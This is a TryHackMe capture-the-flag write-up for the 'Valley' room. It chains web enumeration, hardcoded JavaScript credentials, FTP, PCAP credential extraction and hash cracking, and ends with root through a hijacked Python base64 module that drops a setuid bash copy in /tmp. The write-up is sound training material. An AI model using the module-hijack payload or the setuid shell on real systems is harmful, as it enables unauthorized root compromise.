Valley - TryHackMe Writeup

##TryHackMe Room - Valley

Can you find your way into the Valley?

Valley simulates a realistic enterprise compromise chain: multiple small mistakes (exposed dev artifacts, client-side credentials, password reuse, FTP, PCAPs, UPX-packed binaries, group misconfigurations, Python module hijacking, and root cron) combine to allow full system compromise. This writeup follows the same structure and style as the other room writeups.

##Enumeration

###Nmap Scan

We start with full TCP port enumeration and service version detection:

bash

nmap -p- -vv -sV <TARGET_IP>

Why:

-p-

scans all TCP ports,

-sV

enables version detection,

-vv

gives verbose output.

Results:

22/tcp    open  ssh     OpenSSH 8.2p1
80/tcp    open  http    Apache 2.4.41
37370/tcp open  ftp     vsftpd 3.0.3

We have SSH, HTTP, and FTP on a non-standard port (37370). Non-standard FTP often indicates internal or dev use. Anonymous FTP login fails (

530 Login incorrect

), so the web server is the primary target.

###Web Enumeration

Browsing port 80 shows a static photography site for “Valley Photo Co.” We fuzz directories:

bash

ffuf -u http://<TARGET_IP>/FUZZ -w /usr/share/wordlists/dirb/big.txt -e .txt,.html,.php

Results:

gallery

pricing

static

index.html

Then we fuzz

/static/

bash

ffuf -u http://<TARGET_IP>/static/FUZZ -w /usr/share/wordlists/dirb/big.txt

Among the results, the path

is unusual. Visiting

http://<TARGET_IP>/static/00

returns:

dev notes from valleyDev:
-add wedding photo examples
-redo the editing on #4
-remove /dev1243224123123
-check for SIEM alerts

So we have a username (

valleyDev

) and a hidden dev endpoint (

/dev1243224123123

##Client-Side Credential Exposure

###Dev Login Portal

Navigating to

/dev1243224123123

shows a login page:

“Valley Photo Co. Dev Login”

The page loads JavaScript. Inspecting

dev.js

reveals hardcoded credentials:

javascript

if (username === "siemDev" && password === "california") {

Credentials:

siemDev

<REDACTED>

We log in with these. After authentication we are shown a file:

devNotes37370.txt

Contents:

dev notes for ftp server:
-stop reusing credentials
-change ftp port to normal port

So the same credentials are reused for FTP on port 37370.

##FTP Access and PCAP Download

We connect to FTP with the dev credentials:

bash

ftp <TARGET_IP> 37370

siemFTP.pcapng
siemHTTP1.pcapng
siemHTTP2.pcapng

We download all three. PCAPs often contain plaintext authentication.

##PCAP Credential Extraction

Open

siemHTTP2.pcapng

in Wireshark and filter:

http.request.method == "POST"

Follow the TCP stream of the POST request. Inside the stream:

uname=valleyDev&psw=<REDACTED>

So we recover valleyDev and its password (plaintext over HTTP). We will use these for SSH.

##Initial Foothold via SSH

bash

ssh valleyDev@<TARGET_IP>

bash

cat user.txt

User flag:

<REDACTED>

##Local Enumeration

We enumerate users, sudo, and cron:

bash

ls /home

Output:

siemDev

valley

valleyAuthenticator

valleyDev

A file named valleyAuthenticator stands out. We locate it and transfer it to our attacker machine for analysis.

##Reverse Engineering valleyAuthenticator

bash

file valleyAuthenticator

ELF 64-bit executable, statically linked

bash

strings valleyAuthenticator

We see the string

UPX!

— the binary is UPX-packed. Unpack on our box:

bash

upx -d valleyAuthenticator

Then run

strings

again. We find two 32-character hex strings (MD5 hashes):

Crack them (e.g. with

john

hashcat

). One hash yields credentials for the user valley:

Credentials:

valley

<REDACTED>

##Lateral Movement

bash

su valley

We are now the user valley.

##Privilege Escalation to Root

###Cron and Python Script

bash

cat /etc/crontab

We find:

* * * * * root python3 /photos/script/photosEncrypt.py

Every minute, root runs a Python script. If we can control what that script imports or executes, we can escalate.

###Group Enumeration

bash

id

groups=valley,valleyAdmin

We search for files owned by group valleyAdmin:

bash

find / -group valleyAdmin -type f 2>/dev/null

Result:

/usr/lib/python3.8/base64.py

So we can write to the system

base64

module used by Python. The cron script does:

python

import base64

Python will load

/usr/lib/python3.8/base64.py

. This is Python standard library hijacking.

###Module Hijacking

We append malicious code to

/usr/lib/python3.8/base64.py

(ensure we keep the original module behavior or only append):

python

import os
os.system("cp /bin/bash /tmp/rootbash")
os.system("chmod +s /tmp/rootbash")

Wait for the next cron run (within a minute). Then:

bash

ls /tmp

We see

rootbash

. Run:

bash

/tmp/rootbash -p

bash

id

euid=0(root)

Root obtained.

##Root Flag

bash

cat /root/root.txt

Root flag:

<REDACTED>

Challenge solved.

##Summary

Valley shows how several small issues chain together:

>
Exposed dev endpoints —
```
/static/00
```
and
```
/dev1243224123123
```
from dev notes.
>
Client-side credentials —
```
siemDev
```
/ password in
```
dev.js
```
.
>Password reuse — same credentials for web and FTP.
>FTP and PCAPs — PCAPs on FTP contained plaintext HTTP login (valleyDev).
>UPX and weak secrets — Authenticator binary packed with UPX; hashes inside cracked to valley’s password.
>
Group permissions —
```
valleyAdmin
```
allowed write to
```
/usr/lib/python3.8/base64.py
```
.
>
Cron + Python imports — Root cron importing
```
base64
```
caused our hijacked module to run as root.

Valley - TryHackMe Writeup

##TryHackMe Room - Valley

##Enumeration

###Nmap Scan

###Web Enumeration

##Client-Side Credential Exposure

###Dev Login Portal

##FTP Access and PCAP Download

##PCAP Credential Extraction

##Initial Foothold via SSH

##Local Enumeration

##Reverse Engineering valleyAuthenticator

##Lateral Movement

##Privilege Escalation to Root

###Cron and Python Script

###Group Enumeration

###Module Hijacking

##Root Flag

##Summary

##References

##Answers

###Task 1 - Valley